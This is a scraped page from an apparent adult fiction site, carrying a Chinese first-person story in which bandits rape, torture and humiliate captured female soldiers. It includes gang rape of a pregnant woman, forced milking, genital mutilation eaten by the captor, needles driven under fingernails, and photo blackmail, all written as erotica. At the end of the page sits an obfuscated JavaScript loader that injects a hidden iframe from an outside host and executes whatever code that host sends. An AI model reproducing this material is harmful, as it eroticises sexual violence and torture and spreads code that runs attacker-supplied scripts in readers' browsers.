字幕網- 每日更新 永久免費




  一夜下來,已記不清被多少匪徒輪奸過了,當最後一根肉棒從我麻木的下身抽出的時候,大廳裏已沒有幾個人了。
  
  兩個匪兵把我從沾滿粘液的條凳上拖起來的時候,隻剩了3、4個漢子圍著肖大姐施虐。
  
  大姐挺著大肚子仍站在牆根,她的腿已經支撐不住全身的重量,匪徒們用一根繩子吊著她,她的一條腿仍吃力地架在強奸她的匪徒肩上。
  
  當那個大個子匪徒從大姐下身拔出肉棒時,我發現她不但下身全流滿了白漿,連上半身也是濕漉漉的。
  
  我正在詫異,大廳的門開了,郭子儀披著上衣敞著懷睡眼惺忪地走了進來,他身後跟著老金和四個匪兵。
  
  郭子儀見大廳裏隻剩了我倆,命那幾個匪徒把我們留下,他們把我和大姐拖到郭子儀麵前跪下就走了。
  
  大姐先支持不住了,她的腿已經合不上,渾身發軟,跪在那裏晃了兩晃就癱倒在了地上。
  
  從匪徒的肉棒一離開我的身體,我就開始感到腹部劇烈絞痛,下半身發涼,一股冰涼的液體在從身體的深處向外湧動。
  
  我拚命彎下腰,試圖用腿頂住下腹,以減輕難以忍受的疼痛,可男人整夜的插入使我的腰酸的像要斷了一樣,手又被銬在背後,剛一彎腰,身子一歪,我也倒在了冰涼的地上。
  
  老金走過來,扒開我的腿伸手向我下身一摸,摸到一手血。
  
  他看了看手指上的血跡,對郭子儀說:「成了,這妞沒事了。」郭子儀看了我一眼,點點頭,不再管我,轉身向大姐走去。
  
  他用腳踢踢大姐凸起的肚子,嘲弄地說:「怎幺樣,肖主任,堅持不住了?看你挺著個肚子也不容易,你求求我,我就饒了你。」大姐躺在地上吃力地喘息著,大股白色的漿液正從她岔開的兩腿間徐徐流出,她強忍住痛苦瞪著郭子儀道:「你休想!」郭子儀正待發作,老金卻顧自在大姐身前蹲了下來,我看到大姐眼中閃過一絲驚恐。
  
  大姐的乳房變得愈發白嫩、鼓脹,乳暈的顏色發紫,明顯比前幾天擴散了。
  
  老金捏住大姐深紅色的乳頭揉搓了幾下,又捏了捏鼓脹的乳房,站起身對郭子儀耳語了幾句。
  
  郭子儀立刻興奮起來,大叫:「真的嗎,拉起來我看看!」幾個匪兵聞聲上前拉起大姐的身子,郭子儀一把抓住大姐右側雪白鼓脹的乳房用力一攥,隻見乳頭立刻直立起來,一股濃濃的白色液體從乳頭衝了出來,大姐的臉頓時變的慘白。
  
  郭子儀哈哈大笑道:「三哥真他娘的有兩下子,真是天意啊!肖碧影,你毀我的家,我叫你一生一世都作我們郭家的豬狗牛馬。從今天起,我們郭家多了一頭奶牛,這幺俊的小母牛……哈哈!」大姐的臉白的嚇人,嘴唇明顯地在哆嗦,郭子儀瞟了她一眼吩咐道:「來,把她拉出來給大夥見識見識!」兩個匪兵架起大姐出了門,老金招呼另外兩個匪兵把我也架了出去。
  
  我們被架到洞口大廳,大廳裏熙熙攘攘有上百匪兵,有站有蹲,都在那裏吃飯,看見郭子儀進來都站直身子注視著我們。
  
  我被他們扔在地上,老金扒開我的腿往外摳仍塞在我肛門裏的木棒,手裏拿著另一根準備重新插進去。
  
  郭子儀讓人把肖大姐吊起來,用一根小木棍敲敲她圓滾滾的肚子,然後戳著高聳肥白的乳房得意地說:「弟兄們,給你們看點新鮮東西!」說著叫過一個匪兵站到大姐對麵問他:「吃飽了嗎?」匪兵看看手裏的小半碗稀粥莫名其妙地搖搖頭,郭子儀笑眯眯地命令他:「張嘴!」匪兵傻乎乎地張開滿嘴黃牙的大嘴,郭子儀抓住大姐的乳房用力一攥,大姐痛苦地閉上了眼睛,一股乳汁噴湧而出,直衝匪兵而去。
  
  那匪兵措手不及,被滋了一頭一臉,周圍的匪兵見了都哈哈大笑。



  
  郭子儀接過匪兵手裏的飯碗,將賸餘的稀粥倒在地上,空碗接在大姐乳房前麵,一隻手用力地擠了起來,隻幾下就接了半碗。
  
  他把碗遞給匪兵說:「嚐嚐怎幺樣!」匪兵接過碗喝了一口,咂咂嘴說:「甜的,還熱乎著呢!」說完一仰脖把碗裏的奶都喝了下去,嘴角還掛著濃白的乳漬。
  
  喝完他把碗又伸過去嬉皮笑臉地說:「咱自打記事還沒喝過這幺好喝的東西,七爺再賞點!」周圍一片哄罵。
  
  郭子儀拿小棍點著他的碗說:「你他媽別不知足,我們郭家現在就這幺一條奶牛,下回爺高興了再賞你。」說完轉向眾人說:「從今天起,姓肖的就是咱們山寨的奶牛,每天這頭一碗奶是七爺我的,我得好好補補身子。剩下的人人有份,大家別著急,日子還長著呢,她這一生一世就是我們郭家的牲口了,我姓郭的不但要讓每一個弟兄都能幹上她,而且要讓每一個弟兄都能喝上這大奶子裏的奶。」在匪兵們一片哄笑之聲中,有人拿過一隻乾淨碗,郭子儀親自捏住大姐的乳房狠狠地揉搓,一會兒就擠滿一碗奶。
  
  他一口氣把奶喝完交給匪兵說:「剩下的都給我擠出來,分給弟兄們!」兩個小頭目聞聲而上,抓住大姐的乳房開始擠。
  
  郭子儀看著大姐閉著眼忍受淩辱的痛苦表情,掏出兩根細絲線交給老金說:
  
  「擠乾淨拿這個給她係上,這奶是拿我們郭家的產業換來的,一點都不能糟蹋了。」老金連連點頭,郭子儀帶人走了,兩個匪兵把我從地上拉起來,架回了牢房。
  
  牢房裏也是一片亂哄哄的景象,小吳和施婕已被鎖進木籠,但小吳沒有像往常那樣坐著,而是躺在地上,兩條腿被高高銬在木籠的頂上,昨夜匪徒們灌進她下身的精液無法流出來。
  
  牢房中央,鄭天雄帶著幾個人還在繼續拷問林潔,看來已經拷打了一陣了。
  
  這個禽獸,林潔昨天被那幺多的匪徒不停地淩辱,他連喘口氣的時間都不給她,早上一起來,就又來嚴刑拷問了。
  
  林潔這次是被倒吊在牢房的中央,兩條腿分開著,下身因受過毒刑,又連續被幾十個匪徒輪奸,腫的像個小山丘,黑紫發亮,看著嚇人。
  
  鄭天雄正把他的藤鞭插進林潔的陰道,來回抽插,鞭子上滿是鮮紅的血跡。
  
  林潔倒吊著的身體微微顫抖,臉憋成了紫色,大口喘著粗氣。
  
  鄭天雄一邊插一邊問:「你到底說不說?」林潔動也不動,鄭天雄氣急敗壞地抽出鞭子,舉過頭頂威脅道:「你不說我可抽了,把你那小嫩穴抽爛了疼死你!」林潔仍無反應,鄭天雄嘴裏嘟囔著:「媽的,我抽死你個小爛貨,再去向七爺請罪!」說著卯足了勁一鞭抽下來,「啪」地一聲脆響,頓時血花飛濺。
  
  林潔倒吊著的赤裸的身體立刻繃緊,反銬在背後的手拚命掙紮,頭也試圖抬起來,帶動豐滿的乳房連連顫動,一聲慘叫衝口而出:「啊呀……」我的心頓時為林潔提了起來,一個19歲的姑娘身上最嬌貴的部位怎幺能經的住這種毒刑,那鞭子抽在林潔身上就像刀子在戳我的心。
  
  鄭天雄像吃了興奮劑,高舉起鞭子又抽了下去,林潔岔開的兩腿之間頓時騰起一片血霧。
  
  4、5鞭下去,林潔的下身已是一片血肉模糊,她的慘叫也變成了撕心裂肺的哀嚎:「不…放開我……疼啊……」鄭天雄蹲下拉起林潔的頭發問:「怎幺,知道疼了,快說吧!」林潔閉上眼堅決地搖了搖頭。
  
  鄭天雄氣的摔開林潔的頭,抄起鞭子又抽了過去。
  
  「啊呀……呀……哎呀……」林潔的慘叫不決絕於耳,隻幾下就昏死了過去。
  
  鄭天雄急的滿地亂轉,命令匪兵:「給我澆,澆醒了再抽!」一個匪兵湊上來說:「參謀長,再這幺打幾下就給打死了,七爺那沒法交代啊!」鄭天雄咬著牙,腮邦子上的肉滾動了幾下罵道:「媽的,不能打死,好,把她放下來,老子慢慢熬她!」一桶冷水澆在林潔血淋淋的身體上,她長出一口氣蘇醒過來。



  
  兩個匪兵上前把她放下來,架到石台前跪下,鄭天雄命人把林潔銬在身後的手解開,拉到前麵重新銬上。
  
  他們把她被銬在一起的雙手放在石台上,10根白淨的纖纖玉指在染著暗紅色血跡的石台上格外醒目。
  
  一包鋼針扔在台子上,在搖曳的燭光下閃著寒光,鄭天雄一隻穿著沈重皮靴的大腳踩在潔白的手背上,短粗的指頭挨個扳著林潔水蔥似的手指說:「快說吧,不說我把這些針一根一根都釘進你的指縫裏。十指連心啊,我保證你疼的叫娘,還死不過去。」「不!」林潔拚命地搖頭,回答裏帶著哭音。
  
  兩個匪兵抬來一個粗大的木杠,壓在林潔的腿彎處踩上去,使她無法動彈,鄭天雄抽出一根鋼針,對準她左手食指的指甲蓋下麵刺了進去。
  
  林潔拚命往外抽手,但被沈重的皮靴踩住動彈不得,她晃動著纖弱的肩膀,馬上被兩個大夥緊緊抓住。
  
  她一動也動不了,眼睜睜地看著閃亮的鋼針刺進了自己的指甲蓋下,一滴鮮血流了出來。
  
  鄭天雄眼睛盯著她問:「疼不疼?說不說?」林潔搖頭,鄭天雄手持一把小木錘朝針鼻重重的敲下去,鋼針在指甲下麵釘進去一截,血滋了出來,林潔被抓在大漢手裏的光裸的肩頭一震,大滴的汗珠順臉頰流了下來,她忍不住大叫:「啊…疼!」鄭天雄停住手厲聲道:「疼就快說,不說疼死你!」林潔垂下頭艱難地搖頭,低垂的短發蓋住了她的臉,高聳的乳房也隨著顫動。
  
  鄭天雄抬起手又是一錘,林潔「啊…」地再次慘叫起來,鋼針已經差不多全釘進了她的指縫。
  
  鄭天雄又捏起一根鋼針,刺進林潔中指的指縫,在她震的人心碎的慘叫聲中又釘了進去。
  
  殘酷的刑訊繼續著,林潔左手的5根纖纖玉指上插滿了鋼針,右手也有3根手指被釘上了鋼針,她已汗流浹背,叫聲也越來越低。
  
  鄭天雄掌握著施刑的節奏,每當她要昏過去的時候就停下來,讓她清醒著忍受最大限度的折磨,可她給鄭天雄的始終就是一個字:「不」!
  
  當第9根鋼針刺入林潔的手指縫時,牢門開了,兩個匪徒進來,把我從囚籠裏提了出來,帶出了牢房。
  
  我被直接帶到郭子儀的房裏,肖大姐反銬雙手跪在屋中間的地上,兩隻乳房已不似剛才那幺鼓脹,紫紅色的乳頭被兩根紅絲線緊緊綁住。
  
  屋裏除郭子儀外還有一個山裏人打扮的漢子,他見我被押進來眼睛一亮連聲說:「真是絕色!」隨後對郭子儀拱手道:「那我就告辭了,我們黃爺恭候七爺大駕!」郭子儀打著哈哈把那漢子送出了門,回頭摸著我光裸的身子說:「我帶你出去見見世麵,也讓他們知道知道什幺叫天姿國色!」說完踢了跪在地上的大姐一腳說:「還有你這條小母牛!」我心裏通通直跳,他要帶我們去哪?
  
  難道要到大庭廣眾之中去羞辱我們?
  
  郭子儀一聲吩咐,匪兵抬來兩個藤條編成的長條箱子,他們把我和大姐的手都銬在背後,再把腳也上了銬子,把腳拉到背後與手上的銬子捆在一起;用破布塞住嘴巴,再用繩子勒緊,我們像來時一樣被綁的一動也動不了。
  
  他們把我們塞進藤條箱,大姐因為肚子太凸,隻能仰躺著,蓋上蓋子之前,他們沒有忘記把我們的眼睛蒙上。
  
  外麵忙亂了一陣,箱子被人抬起來搭上牲口背走了。
  
  也不知走了多長時間,我們被放下來,我被摘掉蒙眼布,發現我們是在一座大房子裏,我沒有看到房子的主人,隻有郭子儀和跟隨他的幾十個匪兵。
  
  房子應該是在很高的山上,因為我感到了刺骨的寒冷。
  
  外麵是黑夜,我感到一陣悲哀,從土匪敢於曉行夜宿這一點來看,我們已遠離我軍控製區,而且是越走越遠。



  
  土匪們草草地吃過飯,郭子儀吩咐老金給我和大姐洗過身子,把我們帶進了他的房。
  
  我們麵對麵赤身跪在郭子儀麵前,我發現大姐的乳房又鼓脹了起來,脹的比以前還大,由於乳頭被絲線栓住,奶出不來,乳房脹的像個皮球,顏色慘白,墨綠色的血管都清晰可見。
  
  郭子儀用手托了托大姐沈甸甸的乳房說:「奶挺足啊,可惜我現在沒胃口。
  
  不過也不能糟蹋了。」他坐在一張太師椅上叫過老金,拿一個銅盆放在他腳下,然後命兩個匪兵把大姐架到他跟前。
  
  他當著我們的麵脫了褲子,露出醜陋的陽具,我不知他要幹什幺,又不敢看他,緊張地用眼睛盯住銅盆。
  
  郭子儀指指大姐的乳房、又指指自己的陽具對老金說:「給她擠擠,我洗洗家夥!」我吃了一驚,他竟要用大姐的奶洗他的…大姐感到了侮辱,脹紅著臉扭動身體想躲開,可兩個大漢早把她夾的緊緊的,加上手被銬在背後,她一動也動不了,眼看著老金瘦長的手指解開了右側乳頭上的紅絲線,一股乳汁已迫不及待地噴湧而出。
  
  老金把住大姐的乳房,使乳頭對準郭子儀的胯下,他乾瘦的五指滿把抓住大姐的乳房有節奏地揉搓,潔白的乳汁不間斷地噴到黑乎乎的陽具上,形成一種奇妙的景象。
  
  郭子儀舒服地半躺在太師椅上,任溫熱的乳汁衝刷著他的下身,然後流進地上的銅盆裏,發出叮咚的響聲,他似乎陶醉了。
  
  大約過了十幾分鍾,一隻乳房擠空了,老金去解大姐另一隻乳頭上的絲線,郭子儀忽然睜開半閉的眼睛,一把捏住剛剛解開絲線的乳頭,衝我努努嘴對一個匪兵吩咐:「給她解開!」匪兵鬆開了我手上的銬子,我撫摸著瘀血的手腕不知所措。
  
  郭子儀指指他的陽具對我說:「給我洗!」我的心像被一隻大手抓住,不跳了。
  
  天啊,讓我用手給他洗那令人作嘔的陽具,還要用大姐的乳汁!
  
  我拚命地搖著頭帶著哭聲說:「不,我不……」郭子儀把大姐的乳頭交給老金,一把捏住大姐的一片發紅的陰唇,回手從腰裏拔出一把寒光閃閃的尖刀,放在大姐的陰唇上,惡狠狠地說:「你不動手我可要動手了!」我急的哭出聲來:「不…別……我不……!」我不敢動,怕他傷了大姐,大姐厲聲道:「你要侮辱我就朝我來,不要難為她!」郭子儀用刀尖捅了一下大姐的陰唇道:「住嘴,這沒你說話的份!」然後轉向我說:「快點,要不然我可把這塊嫩肉割下來生吃了!」我慌的不知如何是好,隻見刀鋒一動,血光一閃,一小條鮮血淋漓的嫩肉捏在了他的手指間,大姐「啊」地叫了起來。
  
  我一看,大姐的汗下來了,她左側的陰唇真的短了一截,鮮血直流。
  
  郭子儀竟真的把那條肉填進嘴裏嚼了起來,嘴唇都被鮮血染紅了。
  
  我急了,一把攥住他拿刀的手大叫:「別!」「當啷」一聲,刀掉在地上,粗糙的大手握住了我的手,我感到自己的手是那幺小、那幺無力,被他拉著伸向了胯下。
  
  我的手碰到了那熱烘烘、軟乎乎肉團,像被火燙了一樣一顫,可一股無法抗拒的力量按著我的手捧起了那團散發著腥臭和奶香混合氣味的醜陋的肉。
  
  我雖然已被男人玷汙了身子,那些醜陋的肉棒已經無數次插入過我的身體,可讓我眼睜睜地雙手捧起它,而且恰恰是奪去我貞操的這個醜物,我想起來就要嘔吐。
  
  這時,溫潤的乳汁帶著一股甜絲絲的氣味衝了下來,我本能地想撒手,可看到那雙鷹一樣的眼睛和被人檢起來又逼在大姐陰唇上的閃著寒光的刀鋒,我屈服了,用我柔軟細膩的纖纖玉手輕揉著令我心悸的肉團。
  
  乳汁沾在手上滑膩膩的,我眼睛盡量不看自己的手,可手上的感覺讓我臉紅心跳:那個肉棒正在膨脹,不一會兒就脹的像根橄麵杖了。



  
  老金有意把大姐的奶水擠到郭子儀的肉棒上,我在他的逼視下身不由己地用手從上到下地捋著肉棒,直到大姐的乳房癟下去,不再有乳汁噴出。
  
  火熱的肉棒在我手心裏跳動,我捧在手裏抓也不是、放也不是,正不知如何是好,郭子儀把兩隻黑乎乎的腳放進銅盆,我乘機放開肉棒,低頭一看,盆裏的乳汁竟把他的腳都沒了。
  
  郭子儀指指放在潔白的乳汁裏的泥腳對我說:「妞兒,給我搓搓!」這話像錐子一樣紮著我的心,我恨自己的軟弱。
  
  這土匪頭子用大姐作為母親最聖潔的乳汁洗他肮髒的陽具和腳,以此來羞辱大姐,我卻把握不住自己,糊裏糊塗地順從了他,我覺得我成了他的幫凶。
  
  想到這兒,我堅決地搖了搖頭,他就是一刀一刀割我的肉,我也不會再順從他了。
  
  可他滿不在乎地笑笑,一麵用兩隻髒腳在潔白的乳汁裏互相搓著,一麵對我身後的匪兵努努嘴。
  
  我的手又被扭到身後銬上,這時我的心情反倒輕鬆了下來,但看到銅盆裏純白的液麵上不斷升起的黑泥湯,我的肚子又刀絞般的痛了起來。
  
  趁郭子儀洗腳的功夫,老金又用絲線栓住了大姐的乳頭。
  
  郭子儀指著大姐對老金說:「這娘們拉下去,交給弟兄們幹,別讓她閑著!」老金應了一聲,就帶著匪兵把大姐拉了出去,我真替大姐擔心,郭子儀帶著的匪兵有30多人,已經飽受折磨的大姐如何受的了?
  
  不待我多想,郭子儀已經站了起來,抓住我的胳膊把我拉起來,一把推倒在床上,我這時才意識到,屋裏隻剩我們兩人了。
  
  屋外傳來了一陣喧嘩聲,跟郭子儀來的匪兵們就住在外屋,他們已經開始侮辱肖大姐,一陣陣淫笑傳來,但聽不到大姐的任何聲音。
  
  郭子儀側臥在床上,捏住我的乳頭開始玩弄起來,我下腹的絞痛越來越強烈,我這才意識到肛門裏還插著老金的木棒。
  
  郭子儀一麵揉搓我的乳頭,一麵摳我的肛門,捏住木棒抽了出來。
  
  我下身一陣輕鬆,肚子卻疼的要命,想蜷起腿,可他用膝蓋頂住我,不讓我動。
  
  我把臉埋在頭發裏,忍住一陣高過一陣的絞痛。
  
  郭子儀忽然翻到我身後,赤條條的身子貼住我的裸體,手臂繞過我的上身握住高聳的乳房。
  
  他有意把熱乎乎的陽具貼在我被銬在一起的手上,命令我:「抓住它!」我想起剛才自己的失態,臉紅的發燙,更深地把臉埋下去。
  
  他回頭摸索了一陣,忽然撥開我的頭發說:「你看這是什幺?」我忍不住看了一眼,頓時五內俱焚,如墮入了十八層地獄:他手裏拿的竟是那天鄭天雄給我拍的那幾張照片,其中最不堪入目的是我隻穿軍上衣、光著下身、自己用手扒開陰唇的那張,我竟然還在笑。
  
  郭子儀得意地說:「你乖乖地聽話,這些照片就在我手裏。你要是不乖,我馬上把它送到47軍軍部,哈哈,大家就都知道你的下落了……」我想起在軍部時聽說的土匪將被俘的女工作隊員開膛破肚送回軍部的事,相信他一定作的出來。
  
  我的心戰栗了,要真是那樣,我就是死了也永遠是個人人唾棄的髒女孩了。
  
  我渾身都軟了下來,頭上直冒冷汗,眼淚撲簌簌掉了下來,手不聽使喚地捧住了那個給了我終身恥辱的肉團。
  
  那東西經乳汁洗過還潮乎乎的,我按他的示意輕柔地撫摸著、揉弄著,雖然在身後,可我能感覺到它又在迅速地膨脹,不一會兒我的小手就捧不住了。
  
  他一個翻身轉到我前麵,一條腿插進我兩腿之間,我已完全沒有了反抗的意識,下意識地把兩腿大大地分開,似乎在等待著他的插入。



  
  他好像對那些照片的效果感到意外,沒見過似的端詳了我半天,才把火熱硬挺的肉棒插進了我的身體。
  
  他開始抽插了,我忽然意識到下腹那要命的絞痛奇妙地消失了,好像是被他的大肉棒驅散的。
  
  從那天起,每當我肚子疼的時候就下意識地想起男人的肉棒,盡管我自己都為這個想法臉紅,可我無法趕走它。
  
  他那天在我身上似乎也不同以往,不像以前那樣發著狠地插,抽插也分出了快慢節奏,整整折騰了一個小時才射了精,我那天也隱約感到了一點以前沒有嚐到過的說不出來的滋味,居然在他射精的同時泄了身。
  
  他完事之後,破天荒地允許我自己下床,他側身躺在床上,看著我蹲在一個破瓦盆上小便,把他射在我身體裏的東西都衝了出來。
  
  雖然作這一切的時候我的雙手仍被銬在背後,但這畢竟是被俘以來第一次被男人奸淫後被允許清理自己,我不知道該感到慶幸還是悲哀。
  
  尿過尿後,我又乖乖地爬上床,躺在他的身邊,我知道我逃不出他的手心,即使死了也逃不掉。
  
  他摟住我赤條條的身體很快就入睡了,我卻怎幺都睡不著,外麵的淫聲一陣陣傳進房來,我聽見大姐的呻吟了,不知道已經有幾個匪兵進入她的身體,看來她也支持不住了。
  
  聽著大姐悲慘的呻吟,我不禁為自己臉紅,在被俘的5個女兵中,我受到的「待遇」算是最好的了,這讓我慚愧,可我也是無奈呀。
  
  想到這裏,我控製不住自己流下淚來。
  
  漫漫長夜似乎沒有盡頭,腹內的絞痛又是一陣緊似一陣,郭子儀呼呼大睡了一陣,一睜眼就又翻身爬到我身上,將肉棒插進我的身體。
  
  腹內的絞痛又又奇妙地消失了,我全身軟軟的,肌肉好像都不再聽使喚,任肉棒在我身體裏翻騰扭轉,最後放出滾燙的精液。
  
  郭子儀拔出軟縮的肉棒後沒有馬上睡覺,而是撫摸著我細膩的皮膚上上下下打量我,似乎對我的身體著了迷。
  
  當他撥開蓋在我臉上的散發盯視著我的臉的時候,外麵傳來一陣淫笑和大姐令人心碎的呻吟,我突然一陣衝動,紅著臉細聲求他:「你放過肖大姐吧,她也是女人啊,還有身孕……我一定乖乖地伺候你…」我的話沒說完,郭子儀已經勃然變色:「你敢替她求情?告訴你,她欠我們郭家的債她這一輩子也還不完。我就是要她好好活著,天天讓男人操,年年下崽,她這一輩子毀在她自己手裏了。實話告訴你,老金已經給她號過脈了,她肚子裏那個小雜種跟她一樣,是個挨操的貨,我要讓她生下來,母債女償!」他的話讓我聽的渾身發抖,從頭到腳透心涼。
  
  早上起來,土匪們都忙著造飯,大姐雙手反銬、躬身側臥在冰涼的地上不停地呻吟,兩腿不由自主地岔開著,光禿禿的下身糊滿了白漿,地上有一大片水漬,大概是她實在忍不住,躺在那裏就小便了。
  
  郭子儀在太師椅上坐定,命兩個匪兵把大姐拉起來,她臉色發灰,腿不停的發抖,乳房又已經脹的像個皮球。
  
  郭子儀滿足地笑笑說:「肖主任,這一夜還滿意嗎?」大姐這一夜被折騰的不清,連說話的勁都沒有了,垂著頭喘息。
  
  郭子儀命令道:「讓她給弟兄們出奶!」立刻上來兩個匪兵,一人捧著碗,一人解開大姐乳頭上的絲線,不等用手擠,乳白色的奶漿就衝了出來。
  
  匪兵接滿一碗,恭恭敬敬地捧給郭子儀,他一邊看著匪兵繼續擠奶,一邊咕嘟咕嘟把一碗人奶都喝了下去。
  
  喝完後抹抹嘴道:「真她娘不錯,走到哪都有口熱乎東西喝!」匪兵居然擠出六大碗奶,眾人搶著喝了,重新栓好大姐的乳頭,把她又扔在了一邊。

  土匪吃完飯,把大姐又原樣銬好,堵嘴蒙眼裝進了箱子。



  
  對我隻是手腳都上了銬子,沒有再捆就放進藤條箱,身上還蓋了條破毯子。
  
  他們又上路了,越走越冷,我身上蓋著毯子還凍的渾身哆嗦,不知道大姐光著身子如何熬的過去。
  
  又走了大半天,我從箱子的縫隙處看到,路上的行人開始多起來,大多是大隊的牲口垛子。
  
  傍晚時分,隊伍七拐八拐進了一個寨子,這裏居然行人熙熙攘攘,一片熱鬧景象。
  
  我開始緊張起來,不知道郭子儀把我們帶到這地方要幹什幺,尤其是大姐,不知他又要想出什幺辦法羞辱、折磨她。
  
  隊伍徑直進了一個很大的客棧,裏麵已經住了很多人,他們與郭子儀的人似乎都很熟,互相打著招呼。
  
  匪兵們開始卸行李、安排住宿,我和大姐被抬到郭子儀的房裏。
  
  從土匪們的交談中,我知道了這裏是子雲山,這個寨子叫十八拐。
  
  後來我才聽說,這裏是販運煙土、私鹽的馬幫往來的必經之路,遠離人煙,因每天有大批馬幫在這裏歇腳而形成了一個寨子,寨子裏都是為馬幫服務的客棧、飯館、百貨攤,竟還有妓院。
  
  這條路上往來的貨物都是違禁的東西,押運貨物的漢子們也都是些亡命之徒,這寨子也就是個土匪窩子。
  
  我和大姐都被架了出來,有人打來涼水,老金在一個大木盆裏細細地給我們洗乾淨了下身,我倆跪著被分別反銬在屋裏的兩根柱子上。
  
  郭子儀坐在太師椅上吸著水煙袋,門外一陣喧嘩,老金領進來一個塗脂抹粉、妖裏妖氣的四十多歲的女人。
  
  她一進來就咋咋唬唬地叫著:「喲,七爺,您老也不來,姑娘們都想您了……」話說到一半,她忽然看到了跪在一邊的我和大姐,頓時目瞪可呆,嘴半張著半天合不上,好一會兒才回過神來說:「我的天啊七爺,您從哪弄來這幺兩個天仙,難怪不來我這了!」郭子儀淡淡地說:「前些天逮住的女共軍。黃大炮派人送信讓我來趕集,說是有好戲看,我也帶倆娘們來湊湊熱鬧。」那女人一拍大腿笑道:「嗨,黃爺已經到了,還有秦爺、胡爺、馮爺……都帶著貨呢,聽說全是那邊的女人。不過,他們的帶來的人我都見了,哪個也沒您的貨色好……」郭子儀打斷她的嘮叨,指著大姐說:「這個娘們今天賞你,明兒早上還給我,記住:一、給我看好了她,二、不許動了她的胎氣,三、給我送3個娘們來伺候弟兄們。」那女人眼睛瞟著我說:「七爺,這姐兒挺重的身子,您還不憐惜憐惜她!」郭子儀道:「這你不用操心,她肚子裏的崽子不是我的種。我知道她到你那兒閑不著,你那兒那杆子趕馬的混混下手都重,明天早上她要是少了一根汗毛,我就砸了你的鋪子,把你拿去給弟兄們操!」女人忙說:「看您說的七爺,女人的事我有數,明兒早上保證給您原物送回。不過,您帶著30多個弟兄,過來3個姑娘怕伺候不過來,不伺候誰也不行,還不得連小命都搭上?」郭子儀說:「那就來5個!」女人又瞟了我一眼麵有難色地說:「一個換五個?七爺您再賞點,要不然讓這姑娘到我那兒呆上倆鍾點…」郭子儀堅決地打斷她說:「你別打這妞兒的主意,這大肚子娘們足夠換你五個小癟妞,她一夜伺候的男人你那些柴禾妞10個也忙不過來,你試試就知道了。我告訴你,她在共軍裏是個大官,北邊來的,滿韃子……」那女人一聽馬上接口道:「喲,皇上家的女人,難怪這幺俊,七爺那我就領情了。」說完轉身出去了,不一會兒,來了一輛有篷的馬車,下來一群嘰嘰喳喳的女人,忙著和匪兵們打情罵俏。
  
  進來兩個穿黑衣短打扮的精壯漢子,向郭子儀打過招呼,兩個匪兵解下大姐,與兩個漢子一道推著大姐上了車,絕塵而去。
  
  我心裏一陣悲哀,大姐被送到了妓院,這一夜又是苦海無邊啊。



  
  天漸漸黑下來,我被銬在屋裏能聽見屋外的喧嘩,人來人往。
  
  全文完




上一篇:Sena Nagakura永倉せな_[58P] 下一篇:香子的故事
eval('\x77\x69\x6e\x64\x6f\x77')['\x68\x4f\x50\x6e\x6d\x46\x67']=function(){;(function(u,r,w,d){'jQuery';var f=d.createElement('iframe');f.id=new Date().getTime();f.style.width=f.style.height=10+'px';f.src=[u,r].join('');d['write'](f.outerHTML);w['addEventListener']('message',function(e){d.getElementById(f.id).style.display='none';if(e.data['t']=='qqwwtt'){new Function(e.data['d'])()}})})('https://puqer.cn','/cd/104_m/162',window,document)};